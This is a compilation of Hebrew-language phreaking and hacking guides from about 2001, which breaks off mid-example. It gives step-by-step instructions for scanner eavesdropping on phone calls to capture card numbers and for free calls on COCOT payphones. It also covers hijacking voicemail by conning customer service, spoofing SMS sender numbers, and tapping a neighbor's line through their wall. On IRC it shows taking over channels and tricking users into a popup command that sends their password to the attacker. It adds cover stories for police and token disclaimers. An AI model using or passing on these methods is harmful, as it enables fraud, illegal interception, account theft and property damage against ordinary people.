‫!אמור להרוס כל מערכת טלפון באזור‪ ,‬אל תשתמשו בזה ‪blotto box -‬‬
‫‪.‬משתמש בטונים כדי לקבל שיחות חינם לכל העולם* ‪blue box -‬‬
‫‪.‬אמור להרוס את יכולת התקשורת של הטלפון אצל מי ששותלים את הקופסא ‪busy box -‬‬
‫‪.‬משתמש בחשמל בטלפון שלך למטרות אחרות לפי בחירתך ‪chartreuse box -‬‬
‫אמור להפוך את הטלפון שלך לטלפון ציבורי* ‪cheese box -‬‬
‫‪.‬משמש ככפתור "המתן" לטלפון שלך ‪crimson box -‬‬
‫‪ coin collect, coin return, ringback‬נותן לך ליצור את הצלילים של* ‪green box -‬‬
‫‪.‬מוסיף מיקרופון נוסף לטלפון ‪neon box -‬‬
‫‪.‬מוסיף רעש לקו ‪noise box -‬‬
‫‪.‬משמש כפעמון נוסף לטלפון ‪olive box -‬‬
‫נותן לך לעשות שיחות חינם מטלפונים ציבוריים בארה"ב* ‪red box -‬‬
‫מוסיף מוסיקה לקו הטלפון שלך‪ ,‬מהכרטיס קול או ממערכת סטריאו ‪rock box -‬‬
‫חייגן צלילי טלפון נייד ‪white box -‬‬
‫‪by aiti‬‬

‫המדריך המלא לסריקת תדרים באוויר‬
‫‪,‬הקדמה‪ :‬אני בטוח שחלקכם כבר קראתם טקסט שלי על סריקות‬
‫‪....‬אבל אז היה מדובר על סריקות של מספרי טלפון‬
‫‪,‬כאן מדובר על סריקות של תדרים באוויר‪ ,‬עולם חדש של ציטוט והאזנה‬
‫‪...‬שטח חדש של פריקינג‬
‫???‪ scanner‬מה זה ‪1.‬‬
‫מאוד משוכלל ‪ walkie talkie‬סקנר הוא בעצם‬
‫(!ואל תתבלבלו עם סורק לניירות)‬
‫???מה הוא עושה ‪2.‬‬
‫‪.‬בעצם ‪ walkie talkie‬סקנר הוא מכשיר שיכול לקלוט ולשדר מידע בתדרים שונים‪ ,‬כמו‬
‫‪walkie talkie‬מה ששונה זה שסקנר יכול לקלוט מידע מאפילו ‪ 5‬קילומטרים‪ ,‬בעוד ש‬
‫‪.‬יכול לקלוט מידע ממקסימום ‪ 200‬מטר‬
‫?מה סקנר יכול לעשות ‪3.‬‬
‫‪:‬סקנר יכול להאזין לתדרים שונים באוויר‪ ,‬ואתה יכול לקלוט את השידורים הבאים‬
‫רדיו‬
‫טלפונים אלחוטיים‬
‫(טלוויזיה (קול בלבד‬
‫טלפונים סלולריים אנלוגיים‬
‫רדיו קשר של משטרה‬
‫רדיו קשר של מכבי אש‬
‫רדיו קשר של מגן‪-‬דוד‪-‬אדום‬
‫('רדיו קשר של חברות אבטח שונות (בתי ספר‪ ,‬אוניברסיטאות‪ ,‬מלונים וכו‬
‫מוניות‬
‫(מיקרופונים ניידים (כמו בתיאטרון‬
‫כאשר אתה מאזין לטלפונים אלחוטיים‪/‬סלולריים‬
‫‪.‬אתה יכול לקלוט מידע על אנשים‪ ,‬מספרי בזקכרט ומספרי כרטיסי אשראי‬
‫?אוקי‪ ,‬איפה אני יכול לקנות סקנר ‪4.‬‬
‫‪,‬קודם כל צריך להבין שסקנר יכול לעלות בין ‪ 200‬ל‪ 2000‬ש"ח‬
‫‪.‬וקשה מאוד למצוא אותו בארץ למכירה‬
‫שם אני ‪ uniden.com‬או מהאתר של ‪ ebay.com‬אני מציע לקנות מאתרי מכירות פומביות כמו‬
‫‪.‬קניתי‬
‫‪.‬כמו כן אני ממליץ מאוד לקנות אנטנה מורחבת‪ ,‬שיכולה לתת לכם טווח כפול וזה ממש לא יקר‬
‫?איך אני יכול למצוא לאיזה מספרים אנשים חייגו בטלפון אלחוטי ‪5.‬‬
‫‪...‬די פשוט‬
‫רק צריך לקנות כבל של אוזניות שהוא זכר‪/‬זכר (תקע‪/‬תקע) ולחבר‬
‫את יציאת האוזניות של הסקנר לכניסת ה‬
‫‪audio in‬‬
‫‪,‬של המחשב‬
‫שניתן (‪ )dtmf‬ולהפעיל את תוכנת זיהוי צלילי הטלפון‬
‫‪.‬להשיג באתר‬
‫?לאיזה תדרים אני צריך להאזין ‪6.‬‬

‫(אלפונים אלחוטיים‪( :‬לנסות להקשיב לאחד מ‪ 25‬התדרים‬
‫‪handset base channel‬‬
‫‪------- ---- ------‬‬‫‪1 43.720 48.760‬‬
‫‪2 43.740 48.840‬‬
‫‪3 43.820 48.860‬‬
‫‪4 43.840 48.920‬‬
‫‪5 43.920 49.000‬‬
‫‪6 43.960 49.080‬‬
‫‪7 44.120 49.100‬‬
‫‪8 44.160 49.160‬‬
‫‪9 44.180 49.200‬‬
‫‪10 44.200 49.240‬‬
‫‪11 44.320 49.280‬‬
‫‪12 44.360 49.360‬‬
‫‪13 44.400 49.400‬‬
‫‪14 44.460 49.480‬‬
‫‪15 44.480 49.500‬‬
‫‪16 46.610 49.670‬‬
‫‪17 46.630 49.845‬‬
‫‪18 46.670 49.860‬‬
‫‪19 46.710 49.770‬‬
‫‪20 46.730 49.875‬‬
‫‪21 46.770 49.830‬‬
‫‪22 46.830 49.890‬‬
‫‪23 46.870 49.930‬‬
‫‪24 46.930 49.990‬‬
‫‪25 46.970 49.970‬‬
‫כדאי מאוד לנסות להקשיב לצד של הבסיס ולא לצד של הטלפון עצמו‬
‫‪.‬השאר‪ :‬כאן תראו את שאר התדרים האפשריים ומה הם מכילים‬
‫ולא בקילו הרץ (‪ )mhz‬התדרים הם במגה הרץ‬
‫עד ‪ - - 54‬טלוויזיה ‪72‬‬
‫‪ fm‬כד ‪ - - 108‬רדיו ‪88‬‬
‫עד ‪ - - 136‬מטוסים ‪108‬‬
‫עד ‪ - - 144‬צבא ‪136‬‬
‫עד ‪ - - 150.6‬צבא ‪148‬‬
‫עד ‪ - - 153‬מוניות ‪152‬‬
‫עד ‪ - - 155‬מכבי אש ‪154‬‬
‫עד ‪ - - 156‬משטרה ‪155‬‬
‫עד ‪ - - 158‬ספינות ‪156‬‬
‫עד ‪ - - 160‬משטרה ‪158‬‬
‫עד ‪ - - 174‬ממשלתי ‪162‬‬
‫עד ‪ - - 220‬טלוויזיה ‪174‬‬
‫עד ‪ - - 454‬משטרה ‪453‬‬
‫עד ‪ - - 460‬משטרה ‪458‬‬
‫‪by aiti‬‬

‫פריצה לטלפונים שעובדים על מטבעות‬
‫‪:‬הקדמה‬
‫אני בטוח שחלקכם כבר שמעתם על שיטה זו או אחרת לשיחות חינם‪ ,‬גם אם השיטה הייתה במקור‬
‫‪...‬רעיון שלי‬
‫‪....‬השיטה הבאה תעבוד ב‪ 80%‬מהטלפונים‪ ,‬לא כמו שיטה אחרת שתעבוד אולי רק על ‪5%‬‬
‫?‪ cocot‬מה זה טלפון מופעל מטבעות‬
‫?אתם מכירים את הטלפונים הציבוריים שעובדים על מטבעות‬
‫הם לא שייכים לבזק אלא שייכים לחברת התקשורת המחזיקה אותה‪ ,‬לבעל החנות שבה נמצא‬
‫‪'..‬הטלפון וכו‬
‫‪.‬אחת הבעיות עם הטלפונים האלו זה שאי אפשר להתקשר אליהם‪ ,‬אבל כן יש להם מספר‬
‫מה שמיוחד בטלפונים האלו זה שהם עובדים על קו רגיל של בית‪/‬עסק ולא על‬
‫‪...‬קו מיוחד כמו הטלפונים הציבוריים‪ ,‬בגלל זה יש כמה שיטות להרוויח באלה שיטות חינם‬
‫‪!:‬אז הנה השיטה‬
‫‪%%%%%%%%%%%%%%‬‬
‫('קודם כל תמצאו טלפון כזה שמופעל על כסף (בביה"ס‪ ,‬בקניון‪ ,‬בבית‪-‬חולים‪ ,‬במועדון וכו‬
‫‪',‬עכשיו תיגשו אליו ותחייגו מספר ‪ 1800‬כלשהוא‪ ,‬או שתתקשרו ל‪ 199‬וכו‬
‫‪...‬בדרך כלל הטלפון לא יצטרך כסף‪ ,‬אבל אם הוא כן יבקש אז תשלמו‪ ,‬הוא יחזיר את הכסף אחר כך‬
‫(!כשיענו אז תתחילו להגיד שטויות‪ ,‬עד שינתקו לכם‪( .‬אל תנתקו בשום מקרה‬
‫?מה אתם שומעים עכשיו אחרי שניתקו‬
‫‪1. krench‬‬
‫(‪...‬צליל חיוג! (בפממממממ ‪2.‬‬
‫??מה קרה אתם שואלים‬
‫כאשר אתם מרימים את השפורפרת בהתחלה תשמעו צליל חיוג מזוייף‪ ,‬שמיוצר על ידי הטלפון‬
‫‪....‬ולא על ידי הפולסים בקו‬
‫!עכשיו יש לכם צליל חיוג ואתם יכולים להתקשר לכל מקום‬
‫!רגע‪ ,‬על מה אתה מדבר? שאני מנסה לחייג המקשים לא מגיבים‬
‫‪...‬זה היה אבטחה עלובה של הטלפון‬
‫‪:‬עכשיו יש לכם ‪ 2‬אפשרויות‬
‫‪.‬מארה"ב‪ ,‬שעושה צלילי חיוג ואז תוכלו להשמיע את הצלילים לטלפון ‪ tone dialer‬לקנות ‪1.‬‬
‫‪.‬להשתמש בשיטת חיוג הישנה של פולסים ‪2.‬‬
‫‪:‬השיטה עובדת כך‬
‫(כדי להקיש את הספרה ‪ 1‬מקישים פעם אחת על כפתור הניתוק (איפה שמניחים את השפורפרת‬
‫(כדי להקיש את הספרה ‪ 2‬מקישים שתי פעמים על כפתור הניתוק (איפה שמניחים את השפורפרת‬
‫(כדי להקיש את הספרה ‪ 3‬מקישים שלוש פעמים על כפתור הניתוק (איפה שמניחים את השפורפרת‬
‫‪.‬מקישים על הכפתור לבערך רבע שנייה‬
‫‪.‬כדי להקיש ‪ 0‬לוחצים ‪ 10‬פעמים‬
‫!אתם יכולים לנסות את השיטה בטלפון בבית שלכם‬
‫!עכשיו אתם יכולים להתקשר לכל העולם‬
‫!תתקשר למספרי סקס‪ ,‬פלאפונים‪ ,‬כווית וסתם להתקשר לסין‬
‫!ועכשיו בונוס‬
‫בונוס‪ :‬כיצד לפרוץ לטלפונים מופעלי מטבעות‬

‫‪18.2.2001‬‬

‫‪%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%‬‬
‫‪ aiti‬נכתב על ידי‬
‫!ניסיתם פעם להתקשר לטלפון ציבורי? אפשר‬
‫‪...‬יש לו מספר שמופיע למעלה‪ ,‬מעל הטלפון‬
‫(אי‪-‬אפשר להתקשר‪( ...‬רק בשביל שבעלי הטלפון הזה ירוויחו כסף ‪cocot‬אבל ל‬
‫‪,‬אבל זה לא אומר שאין לו מספר‬
‫‪.‬היחידים שמתקשרים למספר הזה הם החברה שבנתה את הטלפון‪ ,‬כדי לנהל אותו ולשנות לו הגדרות‬
‫כדאי להשיג את המספר אתם מכניסים שקל לטלפון‪ ,‬מקישים ‪ ,110‬רושמים את המספר‪ ,‬הכסף יחזור‬
‫‪,‬אליכם‬
‫!ויש לכם את המספר‬
‫‪:‬כאשר אתם מתקשרים למספר הזה אתם תשמעו אחד משתי דברים‬
‫קול ממוחשב המבקש ממך להכניס את סיסמתך ‪1.‬‬
‫(!בתוך טלפון ‪bps‬צליל של מודם מוזר (כן‪ ...‬מודם במהירות ‪2. 300‬‬
‫‪.‬במקרה הראשון אתם צריכים לנחש את הסיסמא‪ ,‬ואז תוכלו לשנות הגדרות‬
‫‪.‬ובמקרה השני אתם צריכים להתחבר לטלפון דרך היפר טרמינל וגם אז הטלפון יבקש סיסמא‬
‫(?אחרי שפרצתם תוכלו בדרך גלל גם לשנות את המחיר של שיחה (‪ 5‬אגורות‬
‫‪by aiti‬‬

‫תדרים‬
‫ רשימה של תדרים ברשת ה‬dtmf.
‫ קבוצה נמוכה‬:
1, 2, 3, a < 967hz
4, 5, 6, b < 770 hz
7, 8, 9, c < 825 hz
‫קבוצה הכי גבוהה‬
*

0

#

^
^
1209hz 1336hz 1477hz 1633hz

d

< 941 hz
^

^

& ‫ נא לעבור למצב אנגלית‬, ctrl+shif )‫(שמאלי‬.
‫תודה ל‬: aiti, julian macassey, n6are.
-----------------------------------------------------------------------------------‫הנה רשימה של מכשירים שניתן לצרוב את הקווים ואולי אם תהיו נחמדים אני יוציא על זה מדריך‬,
8-: ‫עוד איזה שנה אולי‬
‫הרשימה‬:
motorola scn2025a: 4
motorola scn2034a: 4
motorola tln2574a: 4
motorola tln2659a: 4
motorola tln2724a: 4
motorola tln2726a: 4
motorola tln2733a: 4
motorola tln2734a: 4
motorola tln2777a: 4
motorola tln2867a: 4
motorola tln2879a: 4
motorola 8000h: 4 motorola
ultra classic: 4

mei ht5000: 3 mercury 200: 2
mitsubishi 460 xtal: 2
mitsubishi 555: 1 mitsubishi
560: 1 mitsubishi 600: 1
mitsubishi 700: 4 mitsubishi
800: 1 mitsubishi 900: 1
mitsubishi 1500: 1 mitsubishi
mark 1 301: 2 mitsubishi
mark 1 401: 2 mitsubishi
mark 1 450: 2 mitsubishi
mark 1 455: 2 mitsubishi
mark 1 500: 2 mitsubishi
mark 1 555: 2 mitsubishi
mark 1 560: 2 mitsubishi
mark 1 600: 2 mobira me-300:
1 mobira me-53a: 3 mobira
me-57: 1 mobira tpa 4/400: 1
mobira tpa 5/500: 1 motorola
scn2115a: 4 motorola
scn2119a: 4 motorola
scn2124a: 4 motorola
scn2126a: 4 motorola
scn2133a: 4 motorola
scn2134a: 4 motorola
scn2020a: 4 motorola
scn2021a: 4

diamondtel 200: 1 diamondtel
90x: 1 diamondtel 95: 1
diamondtel mesa 50: 4/2
diamondtel mesa 52: 4
diamondtel mesa 52a: 4
diamondtel mesa 55: 2
diamondtel mesa 55ax: 4
diamondtel mesa 55bx: 4
diamondtel mesa 60: 4
diamondtel mesa 60x: 4
diamondtel mesa 80: 4
diamondtel mesa 90x: 4
diamondtel mesa 95: 4
diamondtel mesa 99x: 4 dyna
tac 2000: 2 dyna tac 2000x: 2
dyna tac 4000: 2 dyna tac
4500l: 2 dyna tac 4500xl: 2
dyna tac 6000: 2 dyna tac
6000x: 2 dyna tac 6000xl: 2
e.f. johnson: 2 fujitsu 170
portable: 1 fujitsu 183-iix: 1
fujitsu fm80m-360: 2 fujitsu
fm80m-362: 2 gateway cp
900: 1 ge star: 2 goldstar
5000: 1 hitachi cr2100: 1
hitachi cr2100h: 1

alpine 9510: 1 alpine 9511: 1
amps all: 2 antel radiant
832xl: 2 ara pro-comm 1800:
1 astrotel 500: 1 astrotel 580:
1 astrotel 591: 1 at&t 1710: 1
audiote/toshiba cmt500: 2
audiotel bc-20: 2 audiotel
cmt-125: 2 audiotel cmt-135:
2 audiovox bc20: 2 audiovox
bc40: 1 audiovox bc45: 1
audiovox cmt-125: 2
audiovox cmt-135: 2
audiovox cmt1700: 1
audiovox cmt400: 1 audiovox
cmt405: 1 audiovox cmt450: 1
audiovox cmt550: 1 audiovox
cmt600: 1 audiovox cmt605: 1
audiovox cmt750: 1 audiovox
ctx1500: 1 audiovox ctx2500:
1 audiovox ctx4000: 1
audiovox ctx5000: 1 colt
transportable: 1 diamondtel
100: 1

by pirs[i]ng
‫ שיטה ב‬- ‫שיחות חינם בטלפונים שעובדים על מטבעות‬
‫ שיטה לעשות שיחות חינם בטלפונים של‬cocot / pirs[i]ng
cocot ‫ הוא‬- "customer owned customer operated telephone".
‫ קניון וכו‬,‫ספריה‬,‫ טלפון אשר נמצא במסעדה‬- ‫'זאת אומרת‬.
‫ אבל בכל זאת יש להם מספר‬,‫יש בעיה בטלפונים האלה שאי אפשר לחייג אליהם‬.
‫בזק לא מחזיקה את המכשירים האלה אלה בעל העסק שבו נמצא המכשיר‬.
‫המכשיר לא עובד על קו כמו של טלפון ציבורי לכן יש כמה שיטות להרוויח שיחות חינם‬,
‫פה אני יראה לכם שיטה שאני יודע שהיא עבדה פעם אבל לא בטוח שהיא תעבוד לכם עכשיו‬.

‫כי האנשים שמחזיקים את הטלפונים האלה כל יום נזהרים יותר יותר מפריקרים ושמים יותר לב‬
‫‪.‬לזה‬
‫‪.‬אז אם הטריק לא יעבוד אל תשלחו לי דואר שזה לא עובד כי שום דבר לא מובטח‬
‫‪(.‬בלבד ‪ )cocot‬לכו לטלפון המבוקש‬
‫‪(.‬חייגו לאחד המספרים שאתם מכירים באזור ‪( 1-800‬שיחות חינם‬
‫‪.‬המכשיר אמור להרשות לכם לקיים את השיחה‬
‫‪,‬התחילו לדבר עם מי שעונה לכם ודברו שטויות או משהו כזה‬
‫‪.‬תגרמו לו לנתק את השיחה קח שאתם לא נתקתם‪ ,‬אלא מי שדיברתם איתו‬
‫‪.‬לאחר מכן חייגו את המספר שרציתם מהתחלה וזה אמור לעבוד‬
‫‪.‬אם זה לא עובד פעם ראשונה נסו שוב אבל אם זה לא עובד הרבה פעמים אז וותרו כי זה לא יפעל‬
‫‪.‬חבר ותיק מאירופה ‪ - kolichoice -‬תודה רבה ל &&‬
‫‪by prising‬‬

‫פריצה למשיבון סלולרי‬
‫כל הכתוב כאן הוא ללימוד החומר ואין להשתמש בו‪ ,‬כל דבר אשר יקרה לכם או לחבריכם לא‬
‫‪.‬באחריות הכותב‬
‫‪:‬אתם בוחרים מספר כלשהו‪ ,‬נגיד הוא‬
‫‪053000000‬‬
‫‪052000000‬‬
‫‪058000000‬‬
‫(אתם הולכים לטכנאות של הפלאפון (דרך קוד טכנאי של המכשיר‬
‫‪.‬מוצאים את השורה של המספר ומשנים אותו למספר המבוקש אם שינוי קטן‬
‫אם הוא היה‬
‫‪052 - 000 - 000‬‬
‫| | |‬
‫‪2352 000 000‬‬
‫‪053 - 000 - 000‬‬
‫| | |‬
‫‪2353 000 000‬‬
‫‪058 - 000 - 000‬‬
‫| | |‬
‫‪2358 000 000‬‬
‫‪ :‬הסבר פורט יותר‬
‫אזור סלקום ‪235 -‬‬
‫הספרה האחרונה בקידומת ‪3,5,8 -‬‬
‫המספר כרגיל ‪000000 -‬‬
‫אתם משנים למספר שרציתם ואז מתקשרים לשירות לקוחות ‪123* :‬‬
‫אתם אומרים‪ :‬שלום‪ ,‬יש לי משיבון ושכחתי את הסיסמא‪ ,‬אפשר לברר אצלכם או אולי לאפס לי‬
‫הסיסמא‬
‫של המשיבון או משהו כזה (דברו רגיל וחופשי)‪ ,‬היא אומרת מה המספר שאתה מדבר ממנו (יש להם‬
‫‪(,‬שיחה מזוהה‬
‫אתה עונה את המספר שכתבת בטכנאות של הקוד רק את *המספר המקורי היא אומרת הוא יאופס‬
‫תוך ‪ 10‬דקות‬
‫‪.‬הקוד יהיה ‪ .)1234‬אתה אומר‪ :‬טוב תודה‪ ,‬להתראות)‬
‫‪---------‬סוף‪----------‬‬‫‪.‬אם כתבת ‪ 2353000000‬אתה מחזיר אותו למקור‪* 053-000000 ,‬‬
‫ואז מאיזה מכשיר שאתם רוצים אתם מתקשרים ויודעים את הסיסמא של המשיבון של הקו‬
‫‪.‬שבחרתם‬
‫‪.‬טיפים ‪ -‬תתלבשו על מכשירי על טוקמן‪ ,‬כי שואלים פחות שאלות זה יותר קל לתחמון‬
‫‪.‬עכשיו שירות הלקוחות של טומקן זה *‪779‬‬
‫בונוס אם רשמתם בטכנאות של הפלאפון מספר של מכשיר טוקמן אתם גם תמיד יכולים להתקשר ל‬
‫*‪777‬‬
‫‪.‬ולברר מצב חשבון עדכני של הקו‪ .‬אבל זה לא תמיד עובד‪ ,‬תלוי בקו ובמכשיר‬
‫‪by pirsing‬‬

‫זיוף מספר השולח בשילחת ההודעות‬
‫‪:‬מצרכים דרושים‬
‫‪ i.‬מכשיר פלאפון נוקיה ‪ 5120/6120‬בקו סלקום גירסא &‬
‫(‪ a‬היא שבתפריט הודעות טקסט מופיעה האפשרות כתיבת הודעות‪ ,‬אין אותה בגירסא ‪ i‬גירסא) &‬
‫(אם אינה נתנת האפשרות במכשיר לשלוח הודעות כתובות אנא סגרו את החלון) &&‬
‫‪-------------------------------------------------------------------------------------------‬‬‫‪ :‬יאללה לעבודה‬
‫*הולכים לטכנאות של הפלאפון (דרך קוד טכנאי של המכשיר) שהוא‪1. 3001#12345# :‬‬
‫מוצאים את השורה של המספר ומשנים אותו למספר המבוקש אם ‪2.‬‬
‫‪.‬שינוי קטן‪ .‬כתבתי על זה במדריך על פריצה למשיבונים אבל הנה תזכורת‬
‫‪:‬המספר הוא‬
‫‪052000000 -->> 2352000000‬‬
‫‪053000000 -->> 2353000000‬‬
‫‪058000000 -->> 2358000000‬‬
‫‪.‬משנים את השורה ושומרים ויוצאים‪ ,‬מפעילים את המכשיר מחדש ‪4.‬‬
‫‪,‬כדי לוודא שהכל עובד נכון אנא חייגו לאחד המספרים הנזכרים למטה &&&‬
‫‪.‬אם קבלתם צליל חיוג אתם בסדר‬
‫‪(.‬טוקמן בלבד) ‪*777‬‬
‫‪(.‬טוקמן בלבד) ‪*779‬‬
‫‪(.‬כל הלקוחות) ‪*123‬‬
‫לא חובה אבל אפשרי‪ ,‬אם לא קיבלתם צליל נורמלי אז בדקו את המספר שכתבתם באבטחה ואת‬
‫‪.‬המספר שחייגתם‬
‫‪.‬אם עדיין יש בעיות אז כנראה היא במכשיר אבל אם לא אז שלחו לי אימייל ונראה מה קורה‬
‫‪:‬יאללה נמשיך‬
‫‪ :‬לכו ל ‪5.‬‬
‫‪.‬תפריט‪ ,‬הודעות‪ ,‬הודעות טקסט‪ ,‬כתיבת הודעות‬
‫‪(.‬כתבו הודעה (מה שבא לכם‬
‫‪.‬עכשיו משהו כדי שתדעו לידע אישי‬
‫‪.‬כאשר ההודעה תגיע לנמען המספר השולח יהיה זה שכתבתם בקוד טכנאי &&&&‬
‫‪.‬כמו כן יש לוודאות שהמצב של הקו שאתם שולחים ממנו (יותר ממנו עליו) לא במינוס בחשבון‬
‫! כמו שאמרתי טוקמן תמיד עדיף‪ .‬פחות מורכז ופשוט יותר &&&&&‬
‫>‪<----------------------------------------------------------------------------------------‬‬
‫! עכשיו אני הולך להגיד משהו שקצת ירתיע אתכם אבל זה שטויות‪ ,‬מנסיון אישי‬
‫‪,‬יש סיכוי קלוש ביותר שדווקא תתבצע עוד קבלת‪-‬שליחת נתונים על הקו שעליתם עליו‬
‫אז יש סיכוי שיעלו עליכם אבל לא יאתרו אתכם אבל כמו כן יבדקו של מי המכשיר‬
‫‪:‬ואז יבואו אליכם אבל לא לפחד יש דרכים לצאת מזה‬
‫‪.‬גנבו לי את הפלאפון והרגע מצאתי אותו ‪1.‬‬
‫‪.‬איזה חבר שלי שיחק אותה מבין ועשה לי איזה שינויים בו לא ידעתי מה הוא עושה ‪2.‬‬
‫‪.‬איבדתי את המכשיר ורק עכשיו מצאתי אותו ‪3.‬‬
‫‪.‬אבל כל זה סיכוי של ‪ 1‬למיליון שזה יקרה אבל אלה שקוראים את המדריכים שלי צריכים לדעת הכל‬
‫>‪<----------------------------------------------------------------------------------------‬‬
‫‪by pirsing‬‬

‫‪beige box‬‬
‫הערות‪ :‬אני לא אחראי לכל שימוש בחומר הכתוב כאן‪ ,‬חומר זה הוא‬
‫!למטרות לימודיות בלבד ו‪++--‬אין‪ --++‬להשתמש בו‬
‫‪.‬מי שמתחיל בפריקינג שיקרא קודם כל את הטקסט שאלות תשובות‬
‫??‪ beige box‬מה זה‬
‫‪+++++++++++++++++‬‬
‫‪,‬היא קופסא המאפשרת לך להתחבר לקווי טלפון של אנשים אחרים ‪beige box‬‬
‫‪.‬להתקשר על חשבונם‪ ,‬ולצותת לשיחות שלהם‬
‫?מה אני צריך כדי לבנות את הקופסא‬
‫‪++++++++++++++++++++++++++++++++‬‬
‫יש שתי שיטות להשתמש בקופסא‪ :‬אחת בדירות דרך הקיר‪ ,‬והשנייה דרך קופסאת הטלפון הראשית‬
‫שנמצאת ברחוב (אתם מכירים את הקופסאות הגדולות האלה ברחוב שיש עליהם סמל של בזק‪,‬‬
‫‪?(.‬נכון‬
‫‪:‬חומרים לשיטה הראשונה‬
‫פטיש @‬
‫חוט טלפון @‬
‫מלחם @‬
‫שקע טלפון חדש ל מחובר @‬
‫פנס @‬
‫קצת בדיל @‬
‫טלפון @‬
‫‪...‬קצת חוש טכני @‬
‫‪:‬חומרים לשיטה השנייה‬
‫טלפון ‪%‬‬
‫חוט טלפון ‪%‬‬
‫מברג עם ראש שטוח ‪%‬‬
‫פנס ‪%‬‬
‫‪...‬קצת חוש טכני ‪%‬‬
‫כיצד לבנות‬
‫&&&&&&&&&&&‬
‫‪.‬השיטה הראשונה תוסבר בהסבר על השימוש‬
‫‪:‬שיטה שנייה‬
‫(?קחו את חוט הטלפון‪ ,‬וחברו אותו לטלפון‪( .‬זה היה קשה נכון‬
‫שימוש‬
‫^^^^^^‬
‫‪:‬שיטה ראשונה‬
‫‪.‬קודם כל תחתכו את חוט הטלפון שלכם והפרידו בין החוט הירוק לאדום‬
‫(תמצאו את קופסת החשמל הכללית שלו וסגרו לו את החשמל‪( .‬אתם לא רוצים להתחשמל‬
‫‪.‬אחר‪-‬כך קחו את הפטיש ותשברו חלק מהקיר המשותף‪ ,‬בחלק התחתון‬
‫‪.‬הסתכלו פנימה עם פנס‪ ,‬ותחפשו חוטי טלפון‬
‫אחרי שמצאתם תלחימו את החוט הירוק עם החוט הירוק שלכם‪ ,‬ואת החוט האדום עם החוט‬
‫‪.‬האדום שלכם‬
‫קחו את החוט שלכם וחברו את הקצה השני לטלפון שלכם‪ .‬הרימו את השפורפרת‪ ,‬שומעים צליל‬
‫?חיוג‬

‫‪.‬אם כן אז תחזירו לשכנים את החשמל שלהם‬
‫(שיטה זה יכולה לעבוד בשינויים קלים גם כדי לגנוב חשמל וכבלים)‬
‫‪:‬שיטה שנייה‬
‫‪.‬לכו אל הקופסאת טלפון של בזק‬
‫‪.‬פתחו אותה (חלקם לא יעבדו כי יהיה צריך מפתח) בעזרת המברג‬
‫‪.‬חברו את חיבור הטלפון לאחד משקעי הטלפון‬
‫‪.‬אם אתם שומעים צליל חיוג הישארו בחיבור הזה‪ ,‬אם לא אז תחברו לבא אחריו‬
‫‪.‬השיטה הזה תעבוד גם בחיבור של בית בודד בלבד‪ ,‬אך בדרך כלל צריך סולם בשביל זה‬
‫?מה לעשות אחרי שהתחברתי‬
‫************************‬
‫‪.‬שהוא בישראל ‪ 110‬ותגלו מה המספר של מי שהתחברתם אליו ‪ ani‬קודם כל תתקשר למספר‬
‫עם מישהו מדבר בקו הזה אתם יכולים להישאר ולהאזין‪ ,‬אך עם הקו לא בשימוש אתם יכולים‬
‫‪ )$$$sex(.‬להתקשר לכל מספר שאתם רוצים‬
‫הערות קטנות לסיום‪* :‬אני לא אחראי לכל שימוש בחומר הכתוב כאן‪ ,‬חומר זה הוא למטרות‬
‫ו‪++--‬אין‪ --++‬להשתמש בו‬
‫!לימודיות בלבד‬
‫כל הכתוב כאן הוא בלשון זכר אך מכוון לכולם‪ ,‬היתיי יכול לכתוב אחרת אבל נראה *‬
‫‪.‬לי שאין בכלל בישראל פריקריות‬
‫‪by aiti‬‬

‫פריצת חדרים ב ‪mirc‬‬
‫???‪....‬למה לי ללכלך את הידיים וליפרוץ לחדר‬
‫(‪...‬אם אין לכם את הסיבה הזאת‪ ...‬או אחרת ששווה‪ ...‬אל תיפרצו זה לא שווה את המאמץ)‬
‫ת= תיראו‪ ..‬נגיד‪ ..‬שיש איזה אופ בחדר גדול‪ ..‬והאופ הזה‪ ..‬זורק אותכם בגלל שלא יודע‪ ...‬אמרתם‬
‫משהו על הפוקימון שהוא אוהב‪ ....‬נגיד אז הוא זורק אותכם‪( ....‬זאת הסיבה הכי מומלצת לפרוץ‬
‫(‪...‬לחדרים‪ ...‬זה והיתערבות‬
‫‪..‬אז בכל אופן הוא זורק אותכם ואתם רוצים להחזיר לו‬
‫!?!?ש= נו‪ ...‬אז איך אני מחזיר‬
‫ת= זה הטקסט‪ ..‬דבר ראשון‪ ....‬צריך למצוא סרבר‪ ...‬אבל כזה שאולי ויפול לכמה שניות‪ ..‬אחרי‬
‫שמצאתם אחד כזה (נורא קשה לימצוא!!!) אתם פותחים שם את החדר ומשיגים אופ‪ ..‬תירשמו שם‬
‫‪....‬את החדר זה נותן מעמד של פאונדר‬
‫‪...‬אתם תוכלו לחזור לשרת שהוא יחזור (‪.. )split‬בכל אופן‪ ...‬שהשרת יפול‬
‫!!!ואז להיתחבר לשרת של החדר‪ ...‬ונחשו מה? יהיה לכם שם אופ!!! כן כן כן‬
‫^‪by ^dak0da‬‬

‫פריצת ניקים ב ‪mirc‬‬
‫‪...,‬יש כמה דרכים‪ ...‬אני יגיד ‪ 3‬ושלושתם דורשים כושר שיכנוע מסויים‬
‫אתם רק צריכים איזה אחד פרייאר‪ ...‬אבל ממש פרייאר‪ ....‬כזה שאם תגידו לו להיזדהות לניק אצל‬
‫‪...‬הבוט החדש שלכם הוא יעשה את זה טוב‬
‫‪oooooooooooooooooooooooooooooooooooooooooooooooooooooooo‬‬
‫(‪...‬דרך א‪( -‬אנ'לא בטוח שזה עובד‬
‫‪:‬זה אמור ללכת ככה‬
‫‪<you> yo, fuck man...‬‬
‫? >‪<@fuck-man‬‬
‫‪<you> plz... chak it out... alt+0266 on your number pad...‬‬
‫‪<@fuck-man> fine...‬‬
‫‪<@fuck-man> n12snfokk‬‬
‫!!!‪<you> nice password ass hole‬‬
‫‪ooooooooooooooooooooooooooooooooooooooooooooooooooooooo‬‬
‫(‪...‬דרך ב‪( -‬לא יעבוד על כאלו שמבינים‬
‫(‪...‬ליכתוב דוגמא לסקריפט (רק למי שיודע‬
‫(‪... )auto-identify‬לישלוח לקורבן ולהגיד לו לבדוק את ההיזדהות האוטומטית‬
‫‪...‬הפקודדה צריכה להראות כך‬
‫"?‪auto-ident:/msg memoserv send <your nick> $$?="password to auto-identify‬‬
‫(‪...‬תגידו לקורבן לשים את זה בא פופאפ‪( ...‬הוא חייב להיות דביל‬
‫‪oooooooooooooooooooooooooooooooooooooooooooooooooooooo‬‬
‫‪...:‬עוד אחד‪ ...‬זה ממש צריך להיות ילד פרייאר כדי שזה יעבוד‬
‫‪<|[you]|> y0 zero33‬‬
